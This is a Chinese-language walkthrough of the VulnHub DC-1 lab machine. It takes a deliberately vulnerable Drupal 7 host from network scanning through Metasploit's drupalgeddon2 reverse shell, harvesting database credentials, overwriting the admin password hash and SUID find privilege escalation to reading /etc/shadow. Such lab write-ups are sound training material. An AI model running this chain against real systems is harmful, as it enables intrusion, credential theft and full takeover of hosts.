靶机描述
靶机地址:http://www.vulnhub.com/entry/dc-1,292/
一、搭建靶机环境
攻击机Kali:
靶机:
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
⬢ kali arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:36:26:ae PCS Systemtechnik GmbH
192.168.9.67 08:00:27:52:4a:68 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.937 seconds (132.16 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢ kali nmap -A -sV -T4 -p- 192.168.9.67
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 17:37 CST
Nmap scan report for bogon (192.168.9.67)
Host is up (0.00039s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 38877/tcp6 status
| 100024 1 46389/udp6 status
| 100024 1 48144/tcp status
|_ 100024 1 55887/udp status
48144/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:52:4A:68 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms bogon (192.168.9.67)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.23 seconds
开放了以下端口:
22—ssh—OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80—http—Apache httpd 2.2.22 ((Debian))
111—rpcbind 2-4 (RPC #100000)
48144
2.2枚举漏洞
2.2.1 80 端口分析
访问:http://192.168.9.67/
这是个Drupal系统
2.3漏洞利用
进入msf:msfconsole -q
使用命令:search drupal
发现有很多可以利用的漏洞
这里不清楚具体用那哪个模块,那么咱们直接挨个尝试,尝试到1就可以利用了,且成功反弹shell,剩下的这里不做测试了,有兴趣的可以都试试。
可以使用use exploit/unix/webapp/drupal_drupalgeddon2
也可以使用use 1以使用该模块
并使用show options查看需要必须设置的参数(yes是必须的)
设置好参数
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.9.67
rhost => 192.168.9.67
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.9.7
lhost => 192.168.9.7
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
设置好相关参数后,使用命令exploit或run进行反弹shell
先输入shell
然后输入python -c "import pty;pty.spawn('/bin/bash')"调用本地shell实现交互式命令行
ls直接发现’flag1.txt’
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt LICENSE.txt cron.php misc sites
INSTALL.mysql.txt MAINTAINERS.txt flag1.txt modules themes
INSTALL.pgsql.txt README.txt includes profiles update.php
INSTALL.sqlite.txt UPGRADE.txt index.php robots.txt web.config
INSTALL.txt authorize.php install.php scripts xmlrpc.php
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
www-data@DC-1:/var/www$
翻译过来的意思是每一个好的CMS都需要一个配置文件-你也是
根据提示去查找drupal的配置文件
进入相关目录,查看settings.php的内容
www-data@DC-1:/var/www$ cd sites
cd sites
www-data@DC-1:/var/www/sites$ ls
ls
README.txt all default example.sites.php
www-data@DC-1:/var/www/sites$ cd default
cd default
www-data@DC-1:/var/www/sites/default$ ls
ls
default.settings.php files settings.php
www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
/**
* Access control for update.php script.
*
* If you are updating your Drupal installation using the update.php script but
* are not logged in using either an account with the "Administer software
* updates" permission or the site maintenance account (the account that was
* created during installation), you will need to modify the access check
* statement below. Change the FALSE to a TRUE to disable the access check.
* After finishing the upgrade, be sure to open this file again and change the
* TRUE back to a FALSE!
*/
$update_free_access = FALSE;
/**
* Salt for one-time login links and cancel links, form tokens, etc.
*
* This variable will be set to a random value by the installer. All one-time
* login links will be invalidated if the value is changed. Note that if your
* site is deployed on a cluster of web servers, you must ensure that this
* variable has the same value on each server. If this variable is empty, a hash
* of the serialized database credentials will be used as a fallback salt.
*
* For enhanced security, you may set this variable to a value using the
* contents of a file outside your docroot that is never saved together
* with any backups of your Drupal files and database.
*
* Example:
* $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
*
*/
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';
.......#省略无用信息
www-data@DC-1:/var/www/sites/default$
成功拿到flag2,翻译过来的意思是暴力破解和字典攻击不是获得访问权限的唯一方法(您将需要访问权限)。你可以用这些凭据做什么?
下边则是和数据库的账号密码
这边需要登录数据库,直接mysql是行不通的,得先进入交互式shell
www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 75
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> use drupaldb;
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
mysql> select name,pass,mail from users;
select name,pass,mail from users;
+-------+---------------------------------------------------------+-------------------+
| name | pass | mail |
+-------+---------------------------------------------------------+-------------------+
| | | |
| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |
| Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org |
+-------+---------------------------------------------------------+-------------------+
3 rows in set (0.00 sec)
mysql>
命令详解:
use drupaldb;–使用drupaldb这个数据库
show tables;–查看当前数据库中的表
select * from users;–查看users表的所有内容
这里看起来很碍眼(多余列)
select name,pass,mail from users;–列出表中的name,pass及mail列的数据
这边看着密码,很明显是经过加密的,按照常规思路,肯定是暴力破解或者是字典攻击
不过嘛,flag2已经提示了,这两个方法不是唯一的方式
所以呢,这里就要提到一个加密脚本了,这个cms对密码加密肯定有脚本的
这里我们去scripts目录下查看相关脚本
www-data@DC-1:/var/www/scripts$ ls -al
ls -al
total 88
drwxr-xr-x 2 www-data www-data 4096 Nov 21 2013 .
drwxr-xr-x 9 www-data www-data 4096 Feb 19 2019 ..
-rw-r--r-- 1 www-data www-data 569 Nov 21 2013 code-clean.sh
-rw-r--r-- 1 www-data www-data 66 Nov 21 2013 cron-curl.sh
-rw-r--r-- 1 www-data www-data 78 Nov 21 2013 cron-lynx.sh
-rwxr-xr-x 1 www-data www-data 4264 Nov 21 2013 drupal.sh
-rw-r--r-- 1 www-data www-data 2955 Nov 21 2013 dump-database-d6.sh
-rw-r--r-- 1 www-data www-data 2573 Nov 21 2013 dump-database-d7.sh
-rw-r--r-- 1 www-data www-data 6814 Nov 21 2013 generate-d6-content.sh
-rw-r--r-- 1 www-data www-data 10790 Nov 21 2013 generate-d7-content.sh
-rwxr-xr-x 1 www-data www-data 2363 Nov 21 2013 password-hash.sh
-rwxr-xr-x 1 www-data www-data 20523 Nov 21 2013 run-tests.sh
-rw-r--r-- 1 www-data www-data 185 Nov 21 2013 test.script
www-data@DC-1:/var/www/scripts$
很明显,password-hash.sh就是加密用户密码的脚本
这里我们直接运行其对123456进行加密,发现直接在当前目录运行不了
www-data@DC-1:/var/www/scripts$ ./password-hash.sh 123456
./password-hash.sh 123456
PHP Warning: include_once(/var/www/scripts/includes/password.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 83
PHP Warning: include_once(): Failed opening '/var/www/scripts/includes/password.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 83
PHP Warning: include_once(/var/www/scripts/includes/bootstrap.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 84
PHP Warning: include_once(): Failed opening '/var/www/scripts/includes/bootstrap.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 84
PHP Fatal error: Call to undefined function user_hash_password() in /var/www/scripts/password-hash.sh on line 87
www-data@DC-1:/var/www/scripts$ cd ..
cd ..
www-data@DC-1:/var/www$ ./scripts/password-hash.sh 123456
./scripts/password-hash.sh 123456
password: 123456 hash: $S$DBnzllOV2HKzzbEg85rgQzV1IV7xjSpOg.EgOyKJpjdd1WGDY2XP
www-data@DC-1:/var/www$
返回上一级目录,在运行,加密成功
下一步就是,将原来admin的密码更改成咱们刚才加密123456的字符串
mysql> update users set pass="$S$DBnzllOV2HKzzbEg85rgQzV1IV7xjSpOg.EgOyKJpjdd1WGDY2XP" where uid=1;
<s="$S$DBnzllOV2HKzzbEg85rgQzV1IV7xjSpOg.EgOyKJpjdd1WGDY2XP" where uid=1;
Query OK, 1 row affected (0.06 sec)
Rows matched: 1 Changed: 1 Warnings: 0
mysql>
修改成功后去网页尝试登录
成功登录后,在dashboard上发现flag3
翻译过来的意思是特殊的PERMS 将帮助查找passwd - 但是您需要-exec 该命令来确定如何获取shadow中的内容。
/etc/shadow 文件,用于存储 Linux 系统中用户的密码信息
2.4权限提升
2.4.1 信息收集
whoami查看当前用户权限,sudo没有命令,su需要密码
www-data@DC-1:/var/www$ whoami
whoami
www-data
www-data@DC-1:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-1:/var/www$ sudo su
sudo su
bash: sudo: command not found
www-data@DC-1:/var/www$ su root
su root
Password: 1
su: Authentication failure
www-data@DC-1:/var/www$
咱们这里使用find / -perm -4000查找系统所有文件中拥有suid特殊权限的文件
www-data@DC-1:/var/www$ find / -perm -4000
find / -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
find: `/proc/3263/task/3263/fd/6': No such file or directory
find: `/proc/3263/task/3263/fdinfo/6': No such file or directory
find: `/proc/3263/fd/6': No such file or directory
find: `/proc/3263/fdinfo/6': No such file or directory
www-data@DC-1:/var/www$
在https://gtfobins.github.io查找一下,发现有可利用的命令find
2.4.2 find提权
这里咱们使用find命令进行提权,这里姿势比较多,咱们就利用现成的文件进行提权
find 文件名 -exec '/bin/sh' \;
www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt LICENSE.txt cron.php misc sites
INSTALL.mysql.txt MAINTAINERS.txt flag1.txt modules themes
INSTALL.pgsql.txt README.txt includes profiles update.php
INSTALL.sqlite.txt UPGRADE.txt index.php robots.txt web.config
INSTALL.txt authorize.php install.php scripts xmlrpc.php
www-data@DC-1:/var/www$ find authorize.php -exec /bin/sh \; -quit
find authorize.php -exec /bin/sh \; -quit
# whoami
whoami
root
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
成功提权
根据flag3提示,咱们需要去shodow获取信息
# cat /etc/shadow
cat /etc/shadow
root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
#
哈哈,找到flag4了,说明存在flag4用户,咱们进入用户目录下看看
# cd /home/flag4
cd /home/flag4
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
#
翻译过来的意思是你能用同样的方法来查找或访问根目录中的flag吗?可能。但也许不是那么容易。或许是这样?
# cd /root
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#
到此,这个靶机已经通关了
总结
本靶机通过msf进行漏洞利用,拿到shell后寻找数据库配置文件,登录Mysql后查询用户密码信息,然后通过靶机自带加密脚本生成加密密码,然后覆盖原来的密码,然后登录后拿到相关信息,最后通过find提权。
- 信息收集
- msf搜索漏洞
- mysql相关查询
- find提权
